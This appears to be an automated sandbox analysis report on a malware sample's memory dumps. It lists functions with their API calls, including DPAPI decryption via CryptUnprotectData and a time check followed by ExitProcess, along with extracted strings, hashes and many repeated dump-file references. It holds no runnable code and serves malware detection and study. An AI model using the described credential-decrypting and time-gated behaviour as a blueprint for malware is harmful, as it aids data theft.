Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 'u}_$Jfh$f{{$l??o$}M$ps}
API String ID: 0-1247301988
Opcode ID: de2f02da3aee57c61819d4a60ab2d7399809e7121d137f585611d587c6b42c51
Instruction ID: 29b9dd95f8afcd8dfbae564ca8c7ae5c1454957f744240227c54097b55ec07c1
Opcode Fuzzy Hash: de2f02da3aee57c61819d4a60ab2d7399809e7121d137f585611d587c6b42c51
Instruction Fuzzy Hash: C9B2C2F36082009FE308AE2DEC8567ABBE9EF94720F16493DE6C5C7744EA3558418797

Function 000A9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000A9AEF
LocalAlloc.KERNEL32(00000040,?,?,?,000A4EEE,00000000,?), ref: 000A9B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 000A9B2A
LocalFree.KERNEL32(?,?,?,?,000A4EEE,00000000,?), ref: 000A9B3F

Strings

N, xrefs: 000A9AD4, 000A9AE1, 000A9AF9, 000A9B18, 000A9AE4, 000A9B1B

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: N
API String ID: 4291131564-1780358921
Opcode ID: cac9cc23ca97d803c317b353a0aab60f063dd77b5b0cb51540dabf26e1c3540e
Instruction ID: 1f6f6ea7b2d19c3b4f9eed47e6024c211732021f89406aa39ff90ebdd3f8a6ea
Opcode Fuzzy Hash: cac9cc23ca97d803c317b353a0aab60f063dd77b5b0cb51540dabf26e1c3540e
Instruction Fuzzy Hash: 9F11A4B4240208EFEB10CFA4DC95FAA77B5FB89700F208058F9159F390C775A941CB60

Function 00484E88 Relevance: 7.9, Strings: 5, Instructions: 1632COMMON

Download Yara Rule

Strings

xOUz, xrefs: 004851FF
D>U", xrefs: 00485A13
=(r3, xrefs: 00485C22
=(r3, xrefs: 00485C2F
lq?>, xrefs: 0048576E

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: =(r3$=(r3$D>U"$lq?>$xOUz
API String ID: 0-3149024110
Opcode ID: bdeaa0da718418ecd275a2b0c5ee8af5b4fcd3200436bd12d247421fe53e9f1e
Instruction ID: 01e9af00207061606107aefde2758166f5ae7c51e7f78c6d6d5b07dd3f35dce6
Opcode Fuzzy Hash: bdeaa0da718418ecd275a2b0c5ee8af5b4fcd3200436bd12d247421fe53e9f1e
Instruction Fuzzy Hash: DCB229F3A082149FE3046E2DEC8566AFBE9EF94720F1A493DEAC4C3744E63558058797

Function 0047CA9F Relevance: 7.8, Strings: 5, Instructions: 1563COMMON

Download Yara Rule

Strings

s[uu, xrefs: 0047CEEF
t$#i, xrefs: 0047D9DC
<&w, xrefs: 0047D622
0"&f, xrefs: 0047D72C
6^z, xrefs: 0047CD1A

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0"&f$6^z$<&w$s[uu$t$#i
API String ID: 0-1644714005
Opcode ID: c4f39b5872a1f7faca4b2a7a52aa5f96d7930fe94082fc374909a89522a88544
Instruction ID: d35c7f1ce6e2e6482891953c1bfd3f2bf4e915fe70f42945a0daeefde1989316
Opcode Fuzzy Hash: c4f39b5872a1f7faca4b2a7a52aa5f96d7930fe94082fc374909a89522a88544
Instruction Fuzzy Hash: C9A2F4F36082049FE304AF2DEC8567AFBE9EF94720F16893DEAC4C7744E63558058696

Function 000B6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 000B696C
sscanf.NTDLL ref: 000B6999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000B69B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 000B69C0
ExitProcess.KERNEL32 ref: 000B69DA

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 08768370290e7e9f9f2d96e0103e98624f29d091b8316134fca0c082006a1b78
Instruction ID: a9fa5ed8c5635e9389e88fe579e4609334d47fb3de6b5783804f0b8cf73d6cb5
Opcode Fuzzy Hash: 08768370290e7e9f9f2d96e0103e98624f29d091b8316134fca0c082006a1b78
Instruction Fuzzy Hash: CB21DC75D14208ABCF44EFE4E9899EEB7B9FF48300F04852EE406E7250EB356609CB65

Function 000A7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 000A724D
RtlAllocateHeap.NTDLL(00000000), ref: 000A7254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000A7281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 000A72A4
LocalFree.KERNEL32(?), ref: 000A72AE

Memory Dump Source

Source File: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 5c574c28b8c6388d56f24a8bb0aecdd8677e79210c5e261ce49e2b0fe012ee0b
Instruction ID: d7602d80a9d4fe34ce64a1f8669cabbf871899197742659cfef6183ffc3d397b
Opcode Fuzzy Hash: 5c574c28b8c6388d56f24a8bb0aecdd8677e79210c5e261ce49e2b0fe012ee0b
Instruction Fuzzy Hash: 84010075A80208BBEB10DBD4DD8AF9D77B8AB44700F104154FB05AA2C0D670BA008B65

Function 004832BF Relevance: 6.7, Strings: 4, Instructions: 1686COMMON

Download Yara Rule

Strings

D"#:, xrefs: 00483E0F
d`?}, xrefs: 00483E39
zB}, xrefs: 004835C6
NV?, xrefs: 004846F1

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: D"#:$NV?$d`?}$zB}
API String ID: 0-838819552
Opcode ID: 5f0db9b0e3fe905dd064b58b46d0e9088792831c1b45d50688f1fb626abd71b8
Instruction ID: 99a4b1064702eb6e888988313703495a6ac4aeed06748b3a76daa258c366bcee
Opcode Fuzzy Hash: 5f0db9b0e3fe905dd064b58b46d0e9088792831c1b45d50688f1fb626abd71b8
Instruction Fuzzy Hash: D0B218F360C2009FE308AE2DEC8567AFBE5EF94720F16493DEAC5C7744EA7558018696

Function 004745DD Relevance: 6.7, Strings: 4, Instructions: 1667COMMON

Download Yara Rule

Strings

USC^, xrefs: 00475185
7U=, xrefs: 0047501E
!7[, xrefs: 004748C7
wI_}, xrefs: 0047509A

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.00000000005AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237922274.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238075304.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2238097881.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: !7[$7U=$USC^$wI_}
API String ID: 0-3659732080
Opcode ID: 1c7e630f1abe7e1d98f2d39df01773281b48d31e3fcd4034392306b242bc6624
Instruction ID: e74b685a7b701e3f0646b3bc75d419e179022a2609924e504a7f6a20876ce5fe
Opcode Fuzzy Hash: 1c7e630f1abe7e1d98f2d39df01773281b48d31e3fcd4034392306b242bc6624
Instruction Fuzzy Hash: 0FB216F36082049FE304AE2DEC8577AB7E9EFD4620F1A853DE6C4C7744EA3598418697

Function 004794B9 Relevance: 6.6, Strings: 4, Instructions: 1616COMMON

Download Yara Rule

Strings

y^_, xrefs: 00479A35
&;z, xrefs: 0047A05F
!$!}, xrefs: 00479E14
O@LU, xrefs: 0047A282

Memory Dump Source

Source File: 00000000.00000002.2237618473.00000000002FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.2237106103.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000A1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000000FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000125000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000128000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000132000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000151000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000182000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000018F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.00000000001BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000245000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.0000000000265000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237128850.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.0000000000595000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2237618473.000000000059D000.00000040.00000001.01000000.00000003.sdmpDownload File
